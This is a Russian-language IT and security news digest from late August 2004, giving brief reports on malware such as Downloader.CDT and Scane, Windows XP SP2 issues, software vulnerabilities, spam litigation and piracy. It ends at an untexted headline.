В Магадане задержана организованная преступная группа, которая занималась нелегальным производством и продажей вирусных компьютерных программ и порнографических фильмов. По данным областного УВД, в ходе милицейской операции сначала была сделана контрольная закупка, что позволило выйти на подпольное производство. При обыске у незаконных торговцев изъято почти 4 тысячи лазерных дисков на общую сумму 300 тысяч рублей. Результаты экспертизы подтвердили, что с помощью предлагаемых преступниками программ можно легко взломать пароль компьютера, применить программы, позволяющие генерировать коды кредитных карт, нанести другой вред владельцам компьютеров. На контрафактных лазерных дисках содержалось более 300 вирусов, а также средств для их разработки.
NewsRu.com

31/08/2004 16:27 Троян Downloader.CDT понижает уровень защиты Internet Explorer
Компания Symantec сообщает об обнаружении новой вредоносной программы Downloader.CDT, заражающей компьютеры под управлением операционных систем Microsoft Windows. После активации троян Downloader.CDT создает на жестком диске собственную копию с произвольным именем и расширением .ехе и вносит ряд изменений в реестр, понижающих уровень безопасности браузера Internet Explorer. Далее троян пытается соединиться с одним из сайтов в домене counterstrike.server.us и загрузить оттуда дополнительный модуль под названием Adware.CDT. Этот компонент впоследствии может использоваться злоумышленниками для отображения на инфицированной машине рекламных баннеров.
Подробное описание

31/08/2004 16:18 Вышла русская версия сервис-пака для Windows XP!
Вот! Дождались! Хотя неизвестно (в свете последних новостей о работе SP2) - хорошо это или плохо, но компания Microsoft объявила о выпуске в свет русскоязычной версии сервис-пака для Windows XP. Полная версия пакета обновлений доступна на сайте Microsoft. Объем дистрибутива русского сервис-пака немного меньше, чем англоязычного. Но скачивать все равно придется немало: полный вариант русского сервис-пака весит 266375 кб против 272391 кб у английской версии. В любом случае, в Microsoft не рекомендуют загружать полную версию сервис-пака обычным пользователям, которым нужно установить обновление на единственный компьютер. Им рекомендуется дождаться появления сервис-пака в системе автоматических обновлений и службе Windows Update, которое произойдет несколько позднее - в середине сентября. Полная версия сервис-пака предназначена для специалистов в области информационных технологий и разработчиков. Она содержит все, без исключения, обновления, тогда как при автоматической установке сервис-пака будут загружаться только нужные компоненты, что позволит заметно сократить объем скачиваемой информации. Как сообщает "Компьюлента", пользователи легальных копий Windows XP смогут заказать сервис-пак и на компакт-диске. На CD будет записываться полная версия сервис-пака. Заказать компакт-диск можно будет на странице безопасности российского сайта Microsoft. Условия поставки компакт-диска в настоящее время обсуждаются. Сам диск, скорее всего будет бесплатен, однако за его доставку может быть назначен определенный сбор.
Страница загрузки SP2RUS
Страница заказа CD с SP2RUS

31/08/2004 12:21 Борьба с хакерами обошлась Microsoft в миллиард долларов
Корпорация Microsoft вынуждена потратить миллиард долларов на совершенствование защиты операционной системы Windows XP от хакеров, вирусописателей и интернет-мошенников. Как сообщается на сайте британской газеты Independent, компания Билла Гейтса предлагает получить обновление бесплатно, чтобы его смогло установить максимально большое число людей. Microsoft потратила 300 миллионов долларов только на кампанию по распространению обновления. Второй сервиспак (SP2) к ОС Windows XP занимает 200 мегабайт; его можно получить на компакт-дисках, прилагаемых к компьютерным журналам, или по заявке. Однако, как предполагается, общая стоимость издержек, вызванная необходимостью выпустить обновление SP2, достигает миллиарда долларов. Сюда входят как расходы на создание дополнительного программного обеспечения, так и задержка выпуска новой версии Windows под названием Longhorn, который перенесен на конец 2006 года.
Подробности

31/08/2004 11:49 Sendmail призывает добровольцев на борьбу со спамом
Sendmail разработала первую пробу ПО, предназначенного для выявления источника сообщений e-mail, — технологии, на которую возлагают большие надежды в деле борьбы со спамом. Компания выпустила модуль для своего почтового сервера Sendmail, который пытается проверять подлинность источника сообщений, чтобы помочь пользователям интернета оградить свою почту от писем нежелательных отправителей. Это часть разрабатываемого интернет-стандарта, называемого Sender ID. «Аутентификация удостоверяет подлинность отправителя сообщения, — пояснил СЕО Sendmail Дэвид Андерсон. — Мы убеждены, что вместо того, чтобы отфильтровывать ненужные сообщения по их содержанию, люди станут пропускать только нужные, поступившие от добропорядочных отправителей». Большая часть электронных писем разносится в интернете программой open-source Sendmail, которая работает с операционными системами Linux и Unix. Новый модуль для этой программы позволяет администраторам e-mail модифицировать свои системы, добавив технологию аутентификации. После этого сервер электронной почты начнет передавать сообщения с обязательным идентификатором Sender ID и проверять подлинность входящих сообщений. Sender ID представляет собой гибридную спецификацию, сочетающую предложенную Microsoft систему Caller ID for E-mail с другой технологией борьбы со спамом, называемой Sender Policy Framework, которую разработал основатель службы e-mail Pobox.com Мэн Вон. Эта спецификация еще не утверждена организацией Internet Engineering Task Force, устанавливающей стандарты для интернета. «Мы хотим ускорить процесс, так как это лучший и самый короткий путь к победе над спамом», — сказал Андерсон. Sendmail распространяет опытную версию программного обеспечения, чтобы привлечь на свою сторону как можно больше компаний и оценить возможности компьютеров по аутентификации электронных сообщений в реальном времени. Испытания Sendmail показывают, что добавление функции аутентификации к серверу e-mail замедляет обработку исходящего трафика на 8%, а входящего — на 15%. «Сейчас важно проверить эти системы аутентификации на реальной почте в реальных системах и определить, достаточно ли надежен предлагаемый подход, чтобы выжить в существующей инфраструктуре», — говорится в заявлении компании.
Подробности

31/08/2004 10:42 Администраторы Windows по-прежнему в цене
По данным опроса, проведённого среди американских руководителей ИТ-подразделений компаний, самой востребованной профессией является администратор Microsoft Windows NT/2000/XP. Новое исследование, проведённое консультационной компанией по подбору кадров Robert Half International Inc. показало, что директора компаний по информационным технологиям (CIO) очень неохотно расширяют штат ИТ-подразделений. В основном набор сотрудников производится только в случае запуска долгосрочных проектов. Опрос проводился среди около 1400 CIO, работающих в различных американских компаниях. 9% опрошенных сообщили о планируемом расширении штата ИТ-подразделений своих компаний, 3%, наоборот, прогнозируют сокращение. Таким образом, на 4-й квартал 2004 года показатель планируемого пополнения штата составил в общей сложности 6%, что на 1% больше аналогичного показателя, прогнозировавшегося на предыдущий квартал. Опрос американских CIO показал, что крупные компании более оптимистично относятся к расширению штата ИТ-сотрудников. Более 75% опрошенных сообщили, что испытывают потребность в администраторах Microsoft Windows NT/2000/XP. Следующими в списке наиболее востребованных профессионалов оказались специалисты с навыками администрирования сетей на оборудовании Cisco и межсетевых экранах Check Point. Далее идут программисты SQL Server. Самый значительный рост вакансий произошел в сфере обеспечения функционирования сетей, спросом пользуются также специалисты, занимающиеся информационной безопасностью и разработкой приложений.
Подробнее

31/08/2004 10:20 Verizon Wireless выиграла иск против спамера
Суд Трентона (штат Нью-Джерси) удовлетворил иск американского оператора связи Verizon Wireless против спамера Джейкоба Брауна, сообщает Associated Press. Джейкоб Браун обвинялся в массовой рассылке непрошенных рекламных сообщений на мобильные телефоны жителей четырех штатов США на протяжении нескольких месяцев. Установив, что Браун является лидером группы спамеров, компания подала на него в суд в июне текущего года. Постановление, вынесенное по данном делу, запрещает Брауну рассылать мусорные сообщения впредь. Verizon Wireless также требовала возмещения ущерба в размере 150 тысяч долларов США, но суд отклонил это требование.
Подробности

31/08/2004 09:30 Хит-парад инструментов для взлома
На сайте thenetworkadministrator.com, позиционирующем себя, как сайт компьютерных профессионалов, опубликован своеобраный хит-парад различных инструментов и утилит, предназначенных для взлома. Представленные "десятки" разбиты на категории: хакерские утилиты, кей-логгеры, утилиты удалённого администрирования (RAT - Remote Administration Tool), шпионские программы (Spyware), трояны и черви. На странице также имеется ссылка на подобный рейтинг за 2003 год.
Топ 10 за 2004 г.

31/08/2004 09:17 Интернет готовится отметить свое 35-летие
35 лет назад, 2 сентября 1969 года, группа студентов из Калифорнийского университета в Лос-Анджелесе (UCLA) под руководством профессора Леонарда Клейнрока (Leonard Kleinrock) создала первую в мире компьютерную сеть, соединив два вычислительных комплекса кабелем длиной 4,5 метра. С помощью созданной системы была осуществлена первая передача цифровых данных на расстоянии - компьютеры обменялись несколькими битами тестовой информации. Проект осуществлялся в рамках военной программы США - аналитики Пентагона из агентства передовых исследований DARPA под руководством Джозефа Ликлайдера (Joseph Licklider) разработали концепцию создания информационно-вычислительной сети для применения ее в оборонных целях. Впоследствии кабелями соединили компьютеры четырех американских вузов, что стало основой информационной сети министерства обороны США ARPANET. Именно она легла в основу современного Интернета. Первым видом коммуникации была электронная почта, дававшая возможность передавать на расстоянии текстовую информацию с большой скоростью. Среди группы студентов профессора Клейнрока был Винтон Серф (Vinton Cerf), впоследствии, в середине 70-х годов, разработавший протокол передачи данных TCP/IP, на котором базируется нынешняя глобальная компьютерная сеть. Концепция публикации общедоступных документов с помощью компьютерных сетей, которая легла в основу Интернета в современном представлении и получила название World Wide Web (WWW), была разработана в 1989 году в Европейской лаборатории физики элементарных частиц (CERN) в Женеве, где англичанин Тим Бернерс-Ли (Tim Berners-Lee) создал технологию гипертекстовых документов. Сейчас Бернерс-Ли возглавляет организацию World Wide Web Consortium, которая систематизирует общепринятые стандарты технологий передачи цифровых данных по публичным сетям.
Lenta.Ru

30/08/2004 14:51 SP2 конфликтует с процессорами AMD
При определенных условиях проблема, выявленная в Service Pack 2, может помешать владельцам компьютеров с процессорами AMD воспользоваться долгожданным обновлением операционной системы Windows ХР. В статье, помещенной на веб-сайте Microsoft в разделе Knowledge Base, компания предупреждает, что Service Pack 2 может не работать с компьютерами на базе 64-разрядных процессоров (то есть Athlon 64 и Opteron) от Advanced Micro Devices. Сначала Microsoft сказала, что владельцам таких ПК, возможно, вообще придется обойтись без обновления, но теперь предлагает обходной путь. Представители AMD сообщили, что пока проблема выявлена при работе с единственным приложением — Realmagic Hollywood Plus DVD Decoder от Sigma Designs. Microsoft тоже указывает на эту программу как на одну из несовместимых. В рекомендации Microsoft говорится, что ПК с 64-разрядными процессорами AMD могут циклически перезагружаться после установки Service Pack 2, если в этих машинах включен так называемый режим предотвращения исполнения данных (data execution prevention, DEP) и имеется аппаратура, требующая использования драйвера Mpegport.sys. Декодер DVD Realmagic Hollywood Plus от Sigma Designs — как раз одно из приложений, использующих этот драйвер. Microsoft предлагает решать проблему путем конфигурирования так называемой функции DEP exception или же вообще удалить SP2.
Подробности

30/08/2004 14:22 Обнаружена несовместимость продуктов McAfee и Windows SP2
Сообщения о несовместимости различных программных продуктов с вновь вышедшим SP2 продолжают поступать с пугающей регулярностью. На сей раз представители компании McAfee объявили, что их решение VirusScan плохо совместимо с центром Windows Security, являющимся частью SP2. Для совместимости двух продуктов требуется выпустить специальную "заплату". Низкую совместимость с SP2 имеют версии более ранние, чем VirusScan 7.1. Также выяснилось, что с SP2 несовместим корпоративный Desktop Firewall от McAfee. В новом решении от Microsoft уже найдено несколько уязвимостей. Однако представители софтверного гиганта утверждают, что найденные "дыры" опасны только при неосторожных действиях со стороны пользователей (то есть, в 95% случаев, учитывая квалификацию большинства пользователей этой ОС "кухарок и домохозяек").
CNews

30/08/2004 14:11 Червь Scane использует дыру в Windows ХР
Компания Symantec сообщает о появлении новой вредоносной программы Scane, заражающей компьютеры под управлением операционных систем Microsoft Windows 2000 и ХР. При распространении червь использует дыру в локальной подсистеме аутентификации Windows (LSASS), заплатку для которой софтверный гигант выпустил еще в середине апреля. После проникновения на машину вирус Scane копирует себя в системную директорию под именем servicec.exe и добавляет ссылку на этот файл в ключ автозапуска реестра. Поиск уязвимых компьютеров осуществляется путем сканирования произвольных IP-адресов. Широкого распространения вредоносная программа Scane на сегодняшний день не получила.
Описание

30/08/2004 13:32 Ошибка в Netscape 7.x позволяет провести "фишинг"-атаку
В популярном броузере Netscape была обнаружена ошибка, которая, как говорится в сообщении, позволяет провести "фишинг"-атаку. Проблема заключается в неправильном отображении Java аплетов в окне с использованием нескольких страниц-"закладок" (tab). Это может быть использовано для подмены контента одного HTML документа другим, находящимся на другой странице-закладке. Сообщается, что это связано с реализацией Java под Apple-платформы и, теоретически, может присутствовать только в приложениях использующих Apple Java-плагины. Уязвимость обнаружена в Netscape 7.2 на Mac OS X 10.3.5 (движок Gecko/20040804 - применяется в Mozilla 1.7.2. В ходе дальнейшего исследования уязвимости J. Courcoul было выяснено, что подобная уязвимость обнаружена также в Netscape Navigator 7.1, Mozilla 1.7.2, Firefox 0.9.3. В браузерах Camino, Opera, iCab, OmniWeb, MSIE 5.2.3 (правда, в последнем табы не применяются) уязвимость не подтвердилась. Как ни странно, также уязвимость не присутствует в Netscape Navigator 7.0.2. Проверка осуществлялась в MacOS X 10.3.5 с Java 1.4.2 Update 1.
Подробности

30/08/2004 12:06 Уязвимость в IOS
Компания CISCO сообщает в своём бюллетене о наличии уязвимости в выпускаемой этой компанией ОС - IOS. Специальным образом сформированный TCP-пакет, направленный на telnet или reverse telnet (особенность CISCO, используемая для предварительного подключения к telnet-порту с дальнейшим подключением к третьему устройству через асинхронную последовательную линию) порт может привести к блокировке таких служб, как telnet, reverse telnet, Remote Shell (RSH), Secure Shell (SSH), которые используются для получения удалённого доступа к устройству. В некоторых случаях возможно также отключение HTTP-сервиса. Успешность атаки требует установления полноценного TCP-сеанса с осуществлением полноценного "тройного рукопожатия" (3-way TCP handshake, SYN -> SYN-ACK -> ACK), что делает если и не невозможной, но крайне трудноосуществимой атаку с подменой IP-адреса (спуфинг). Суть уязвимости заключается в блокировке службы виртуальных терминалов (VTY) после приёма определённого TCP-пакета. Уязвимость присутствует в версиях IOS до 12.2(15)T. Обновление ОС будет доступно в ближайшее время, пока же предлагаются меры для предотвращения возможности проведения атаки, описанные в бюллетене от CISCO.
Бюллетень CISCO

30/08/2004 11:59 Уязвимость в OpenBSD
Secunia сообщает об обнаруженной уязимости в OpenBSD 3.x, которая позволяет злоумышленнику провести DoS (Denial of Service) атаку. Проблема заключается в неправильной проверке ICMP-пакетов, что может быть использовано для выведения из строя уязвимой системы при формировании специального ICMP-пакета и посылки его с одного интерфейса на другой. Для того чтобы использовать уязвимость, требуется чтобы был включен IPsec и система выполняла маршрутизацию между двумя подсетями. Так как в правильно настроенном файрволле невозможно сформировать пакет, который бы пересылался с наружного интерфейса, область применения уязвимости ограничена локальной (внутренней) сетью. Выпущен патч, исправляющий данную уязвимость.
Подробности

30/08/2004 11:20 Оллчин: «Не называйте ее Shorthorn»
По словам шефа Windows, решение об усечении Longhorn было подсказано разработчиками и производителями ПК, которые ценят своевременный выпуск дороже дополнительных возможностей по управлению данными. В интервью CNET News.com в пятницу Джим Оллчин пояснил, что решение об исключении из Longhorn новой файловой системы WinFS принято для того, чтобы гарантировать выход операционной системы в 2006 году. «Моя задача — сделать Longhorn лучшей ОС в нашей истории, — сказал вице-президент по платформам софтверного гиганта. — На каком-то уровне наступил момент, когда надо было сказать себе: „Довольно”, и мы взяли курс на повышение качества». Когда компания закончила работу над Windows XP Service Pack 2 и обновлениями к Media Center и планшетным ПО, Оллчин задумался над Longhorn и понял, что амбиции этого проекта и намеченные сроки несовместимы. По его словам, производители ПК и Intel хотели, чтобы следующая версия Windows использовала преимущества усовершенствованной аппаратуры — и чтобы они могли уверенно строить планы на 2006 год. Оллчин отметил, что беспокойство производителей ПК по поводу своевременного выпуска Longhorn нагнеталось в течение всего первого полугодия 2004. Свертывание других относящихся к Windows проектов «дает мне время отойти на шаг назад и сказать: „ОК, а тем ли путем мы идем, учитывая накопившиеся вопросы?” А вопросы такие: „У вас будет ОС, поддерживающая наши усовершенствования в аппаратуре? Вы поможете нашим разработкам? Нам нравится ваша концепция… но не могли бы вы точнее сказать, когда она будет реализована?”». В начале июля «Я сказал себе: „Надо что-то менять”. И тогда мы задумались». Оллчин собрал высшее руководство, включая СЕО Стива Баллмера и председателя правления Билла Гейтса, и объяснил свои опасения, а затем обсудил с руководителями проектов практический способ исключения WinFS из Longhorn. И все же, по словам Оллчина, давать Longhorn без WinFS унизительную кличку Shorthorn неправильно, так как операционная система «нашпигована новыми возможностями». В числе других функций он упомянул «великолепную поддержку роуминга», .Net Framework 2.0, «новые возможности браузинга», «свежий» пользовательский интерфейс, улучшенные средства миграции и внедрения, «лучшая сопротивляемость malware» и «новые фотографические способности».
Более подробно

30/08/2004 10:36 Недельный отчет о вирусах Panda Software
Опубликован еженедельный отчёт о вирусной активности компании Panda Software. В отчёте рассмотрены пять вредоносных кодов: вирус Shruggle.1318; два червя - Sasser.G и Gaobot.AIR; а также два троянца - MhtRedir.S и StartPage.JL.
Отчёт

30/08/2004 10:12 ISS выпустила обновление XPU для Internet Scanner 7.0
Компания Internet Security Systems сообщила о выходе нового обновления X-Press Update 7.35 для сканера безопасности Internet Scanner 7.0. Обновление включает 8 новых проверок, включая уязвимости SSL, pcAnywhere и Windpws XP SP2. Кроме того, XPU обновляет некоторые из уже существующих проверок для снижения числа ложных срабатываний и обнаружения уязвимостей. Загрузить обновление можно с веб-сервера компании, а также при помощи утилиты X-Press Update, входящей в состав системы Internet Scanner. Кроме того, все обновления (в т.ч. и в автоматическом режиме) можно загрузить с помощью системы централизованного управления RealSecure SiteProtector.
CNews

29/08/2004 15:50 Nullsoft латает Winamp
Nullsoft (разработчик Winamp) залатала дыру, обнаруженную в Winamp предыдущих версий, выпустив версию 5.05. В этой версии проблема загрузки скинов решена двумя методами:
- До инсталляции скина пользователю выдаётся окно, в котором предлагается подтвердить (либо отвергнуть) инсталляцию скина;
- Вместо немедленной загрузки скина происходит только его извление (из архива).
Всем пользователям рекомендуют немедленно обновить версию Winamp.
Страница загрузки

29/08/2004 13:32 Microsoft обвинили в клевете на Linux
У юристов корпорации Microsoft прибавилось работы: рекламная кампания «Узнай факты» (Get the Facts) была признана клеветнической по отношению к Linux, а Евросоюз начал новое антимонопольное расследование деятельности компании в Европе. В рамках рекламной кампании Get the Facts корпорация Microsoft заявила, что сервер под управлением Linux и его обслуживание обойдутся в 10 раз дороже, чем использование машины, на которой установлен Windows Server 2003. Британская Комиссия по рекламным стандартам (ASA, Advertising Standards Authority) признала, что эти утверждения не соответствуют действительности, сообщает BBC. Дело в том, что тестирование программных продуктов было проведено на разном оборудовании. Сервер под управлением Linux был установлен на компьютер, оснащенный более дорогим процессором IBM z900, а работу Windows Server 2003 обслуживали два дешевых и быстрых процессора Xeon 900 МГц. Естественно, итоговый результат подтвердил преимущество Microsoft, чего и добивались организаторы рекламной акции. Обнаружив такое несоответствие, ASA предписала Microsoft изменить рекламу и опубликовать результаты объективного тестирования.
Nixp.Ru

29/08/2004 12:34 Игру Half-Life 2 теперь можно официально скачать
Долгожнанная игра Half-Life 2 вот-вот должна появиться на полках магазинов. Для того, чтобы взбодрить утомленных полуторагодовым ожиданием игроков, 26 августа разработчик игры, американская студия Valve, дала возможность всем желающим скачать ее "заблокированную" версию со своих серверов, сообщает BBC News. После официального релиза скачавшие игру из интернета смогут приобрести ключи для разблокирования и начать играть. Хотя до сих пор точная дата выхода разработчиками не объявлена. Некоторые полагают, что она выйдет не раньше ноября, другие - что совсем скоро. На форумах, посвященных Half-Life, встречаются мнения, что предложенная для скачивания версия игры не является полноценным ее вариантом из-за относительно небольшого размера файлов (500 мегабайт), и что после приобретения кодов для разблокирования игрокам придется докачивать оставшуюся часть. Сейчас желающие загрузить игру вынуждены ждать, поскольку серверы разработчиков перегружены. В помощь геймерам пришла сеть файлового обмена BitTorrent, где уже появились копии игры.
Подробности

29/08/2004 12:20 Эксплоит уязвимости Winamp
На сайте packetstorm опубликован код эксплоита, использующего уязвимость, недавно обнаруженную в популярном медиа-плеере Winamp. Код состоит из HTML-странички, PHP-скрипта и ещё нескольких XML-скриптов.
Код эксплоита

29/08/2004 11:50 Когда может наступить «паралич интернета»?
Уважаемая "Веб-планета", в свете недавно появившихся (и, естественно, несбывшихся) предсказаний новоявленного российского Предсказамуса, решила провести блиц-опрос о возможности подобного события. О компетентности выбранных интервьюируемых судить не берёмся, но с их мнением будет ознакомиться небезынтересно. Внося свои 2 копейки в подобный опрос хотелось бы сказать, что подобная ситуация ТЕОРЕТИЧЕСКИ (!) возможна. В качестве вектора атаки можно предположить атаку на корневые (ROOT) DNS-сервера. Организовав подобную DDoS атаку на 13 этих серверов и вывев их из строя (опять же - исключительно теоретически) можно на некоторое время парализовать работу DNS-службы, являющейся стержнем работы сети Интернет (DNS построена, как известно, на рекурсивных построениях запросов). Однако, учитывая "толщину" каналов этих серверов подобная ситуация довольно гипотетична.
Опрос Вебпланеты

29/08/2004 11:16 Защита CD от копирования вне закона?
В Париже начато расследование против одного из крупнейших звукозаписывающих лейблов EMI и музыкального магазина Fnac. Сразу несколько человек подали иски, в которых утверждается, что аудиодиски, защищенные от копирования, незаконны и должны быть изъяты из продажи. По замыслу EMI, технология защиты CD от копирования должна предотвратить распространение музыки через интернет. Однако вскоре выяснилось, что такие диски невозможно прослушать с помощью ряда автомагнитол и музыкальных центров. Пользователи персональных компьютеров также столкнулись с подобными проблемами. Французская ассоциация потребителей UFC-Que Choisir усматривает в действиях EMI намеренный обман покупателей, которым не позволяется делать личные копии законно купленных дисков (такое право было утверждено законом в 1985 г.). Представитель ассоциации Жульен Дюнон (Julien Dourgnon) заявил, что возможность копировать диски (например, для переноса музыки на портативные MP3-проигрыватели) очень важна для многих меломанов. «Мы защищаем свободу, а не пиратство», — добавил он. В случае если Fnac и EMI будут признаны виновными, им грозит штраф в размере $227 тыс. Если же при этом суд решит, что CD, защищенные от копирования, должны быть изъяты из продажи, то потери компаний будут существенно больше. Fnac уже согласился пойти «на мировую» и компенсировать покупателям стоимость спорных дисков.
CNews

29/08/2004 11:05 Создание самозагружающегося CD с видеофильмом
В статье Create Self-Booting Movie CDs приводится пример создания загрузочного CD предназначенного для просмотра записанного на него фильма, сообщает Opennet.ru. Для построения CD используется дистрибутив eMoviX (10 Мб). Подробно рассказано как из DVD оригинала создать avi файл для записи на обычный CD.
Статья

29/08/2004 10:48 Суд приступит к рассмотрению дела взломщика "1С"
Благовещенский городской суд 8 сентября приступит к рассмотрению дела против Сергея ДАВЫДЮКА, написавшего популярный эмулятор для серии программ «1С». Как передает корреспондент информационного агентства «Дейта.RU», инициаторами возбуждения уголовного дела выступили компании «1С» и «Алладин». Сергей Давыдюк, так же известный как «Соболь», создал программу HASP-эмулятор. Она позволяет работать с продуктами «1С» («1С:Предприятие» и «1С:Бухгалтерия») не используя лицензионный ключ. По признанию большинства пользователей, это значительно облегчает процесс работы с программами. В 1999 году Сергей Давыдюк взломал систему безопасности широко известного программного продукта "1С". Сделал это без всякого, как он сам утверждает, злого умысла. "- Дело в том, что программа "1С" - достаточно громоздкий и неудобный продукт, - поведал Соболь корреспонденту "КП". - Лицензионная версия программы снабжается так называемым ключом защиты. Ключ вставляется в LTP-порт, и каждый раз когда бухгалтер запускает программу, она обращается к этому ключу. Если при этом на предприятии установлена локальная сеть, то программа во многих случаях не обнаруживает ключ и отказывается работать. Да и сам ключ защиты начинает конфликтовать с другим оборудованием, например, с принтером или сканером. А я сделал программу, которая подменяет собой ненужное, на мой взгляд, устройство". Сделав программу-взломщик, Сергей выложил ее на свой сайт в Интернете. Просто так, бесплатно, ее мог скачать любой желающий. И желающих, надо сказать, нашлось немало. К 2003 году программу можно было встретить на доброй сотне сайтов, она появилась почти в каждом российском предприятии, которое работает с продуктом "1С". Потерпевшая сторона - "1С" - предъявила Сергею Давыдюку официальные обвинения. Предполагается, что обвинения будут предъявлены по статьям 273 УК РФ (создание вредоносных программ для ЭВМ) и 146 УК РФ (нарушение авторских или смежных прав).
"КП" о Сергее Давыдюке

29/08/2004 10:26 Новая версия ASPLinux Server
Компании ASPLinux и "1С" выпустили новую версию специализированного дистрибутива ASPLinux Server II в линейке издания"1С:Дистрибьюция". ASPLinux Server II продолжает линейку серверных дистрибутивов, разрабатываемых компанией ASPLinux, позволяющий построить сетевую инфраструктуру как малых и средних компаний, так и крупных предприятий. Продукт оптимизирован для создания корпоративных серверов различных классов и поддерживает различные серверные архитектуры, включая многопроцессорные, и системы с большими объемами памяти. ASPLinux Server II включает в себя средства для построения, настройки и администрирования почтового сервера, Web-сервера, сервера печати, сервера приложений, сервера баз данных и файлового сервера. Серверный дистрибутив ASPLinux содержит исправления и обновленные версии пакетов, что обеспечивает высокую стабильность и защищенность системы. Кроме того, в ASPLinux Server II входят демонстрационные и пробные версии коммерческих пакетов, включая систему резервного копирования Linux-серверов Acronis True Image Server for Linux.
Пресс-релиз

28/08/2004 14:59 Лидеры пиратского рынка
В Лондоне обнародован очередной доклад Международной федерации звукозаписывающей индустрии (IFPI), посвященный вопросам коммерческого пиратства. Приведенные в нем данные свидетельствуют, что все предпринимаемые меры по борьбе с производителями и распространителями нелегальных компакт-дисков остаются недостаточными. Сейчас доля пиратской продукции на мировом рынке компакт-дисков составляет 35%, общий ущерб, нанесенный музыкальной индустрии за 2003 год, оценивается в 4,5 млрд. долл. Правда, в докладе содержатся и оптимистичные моменты. Специалисты считают, что темпы роста пиратской продукции все же несколько замедлились. И в подтверждение приводят следующую статистику: если в 2000 году «левым» был каждый пятый диск, то сейчас – каждый третий. В 2003 году темпы роста доли пиратской продукции были самыми низкими за последние четыре года – всего 4%. Тогда как еще в 2002-м этот показатель составлял 14%. Лидируют в производстве пиратской продукции Бразилия, Китай, Мексика, Пакистан, Парагвай, Россия, Испания, Таиланд и Украина, причем наибольшая доля нелегальных дисков приходится на Китай (на сумму в 600 млн. долл. в год) и Россию (330 млн.). Особое внимание аналитики обращают на тот факт, что в нынешнем году в списке не оказалось Польши (ее вытеснил Пакистан), но по-прежнему присутствуют две представительницы «большой восьмерки» – Россия и Испания. России уже десять лет подряд пытается вступить во ВТО и именно в этом году добилась значительных успехов на этом направлении, заручившись поддержкой ЕС в обмен на нечеткие обещания ратифицировать Киотский протокол. Однако, по некоторым данным, на июньском саммите G8 России было указано, что именно защита интеллектуальной собственности является той проблемой, без решения которой рассчитывать на политическую поддержку при вступлении в ВТО не приходится. По данным американского правительства, доля пиратской продукции на российском рынке достигает 66% среди музыкальных записей, 80 – видеофильмов на DVD, 88% – в программном обеспечении. Более того, именно российское правительство разрешает выставлять на продажу конфискованное у «пиратов» оборудование для производства компакт-дисков. Хотя в большинстве же стран мира его принято уничтожать.
Подробности

28/08/2004 14:35 IBM выложила в свободный доступ свою версию Java Runtime
Компания IBM сделала свободной для загрузки Linux-версию своей среды для запуска программ на Java. Такой шаг, по словам представителей компании, был предпринят для облегчения жизни пользователям открытой среды разработки на Java — Eclipse. Сообщается, что ранее нужно было сперва скачивать Java Runtime с сервера Sun, а потом Eclipse — с сервера IBM. Однако в этом шаге можно усмотреть и другой мотив — попытку IBM привлечь на свою сторону большее количество Java-программистов и, тем самым, составить конкуренцию аналогичным продуктам от Sun Microsystems — Sun Java Runtime Environment и Java NetBeans IDE.
nixp.ru

28/08/2004 14:13 Мировая атака Sun на HP не затронет Россию
В связи с рядом вышедших на CNews.ru публикаций, в которых обсуждалась ситуация на рынке серверов в России вообще и политика отдельных компаний в частности, российское представительство Sun считает необходимым уточнить собственную позицию относительно ряда затронутых вопросов. Компания обращает внимание на нежелательность использования обобщенных статистических данных для иллюстрации расстановки сил на отдельных специфических сегментах рынка. Программа HP Away предусматривает содействие клиентам HP, обеспокоенным известиями о поэтапном свертывании производства серверов на платформе AlphaServer Tru64, в переходе на программно-аппаратные решения от Sun. Первоначально она была инициирована в сегменте "тяжелых" серверов. По данным Gartner Dataquest, в секторе RISC UNIX-серверов в первом квартале 2004 года доля рынка Sun превышала 70% в абсолютном исчислении и достигала 50% в денежном выражении. Действие программы HP Away было распространено на относительно новый для Sun рынок серверов архитектуры х86 позднее - с середины августа 2004 года, поэтому любые оценки продаж в этом сегменте компания считает преждевременными. Представители Sun отмечают, что бизнес компании в России развивается динамично, темпы роста достигают 20% в год при том, что темпы роста рынка серверов составляют около 14%.
CNews

28/08/2004 13:50 Обнаружен дефект в 65-ой серии телефонов Siemens
Подразделение мобильной связи концерна Siemens AG обнаружило дефект программного обеспечения в мобильных телефонах 65-ой серии, который может привести к повреждению органов слуха у пользователей. Ошибка присутствует в моделях C65, M65, S65, CX65, SL65 и в модификациях CV65, CT65, CVX65 и CXT65. Программная ошибка повлияла на громкость звукового сигнала, который раздается при разрыве связи вследствие разряда батареи. Компания провела лабораторные тесты, в ходе которых выяснилось, что программный дефект проявляется только в ПО одиннадцатой версии и предыдущих версиях. Во время разговора сигнал о разряде батареи звучит трижды в течение одной минуты, после чего звонок автоматически прерывается. Громкий звуковой сигнал раздается непосредственно перед разъединением. Если в этот момент пользователь держит телефон возле уха, то травма неизбежна. Для исключения вероятной возможности повреждения слуха компания Siemens рекомендует пользователям дезактивировать мелодию разъединения или функцию анимации отключения, а также прервать разговор, как только раздастся первый сигнал, предупреждающий о разряде батареи. Siemens уже разработала новое ПО, устраняющее неисправность в телефонах 65-ой серии, которое должно быть одобрено операторами связи. Обновленная версия ПО будет распространяться бесплатно уже в самое ближайшее время.
Подробное описание

28/08/2004 13:09 Вирус для Winamp: волк в овечьем скине
Производители вредоносного ПО нашли способ заражения программных mp3-плееров Winamp за счет использования ошибки в алгоритме загрузки так называемых «графических тем». Брешью в защите плеера, как пишет CNET со ссылкой на французскую компанию K-Otik Security, уже воспользовались ряд вирусописательских бандформирований. Первыми жертвами атаки, главной целью которой была установка на атакуемые компьютеры шпионской программы, стали пользователи IRC-чатов, кликнувшие на предложенную им ссылку, якобы ведущую к прикольному скину. Переход на сайт-ловушку вызывало заражение компьютера жертвы, а также заставляло его автоматически отправлять новые IM-сообщения с рекламой. Представители America Online, которой принадлежат права на распространение плеера, заявили, что им известно о наличии дыры и инструментов для ее эксплуатации, однако о времени выхода заплатки говорить пока рано: «мы изучаем сообщения [о распространении вируса] и, в случае нужды, предоставим [пользователям] необходимую информацию в соответствующее время».
Internet.Ru

28/08/2004 12:24 Новая версия операционной системы Windows выйдет в 2006 году
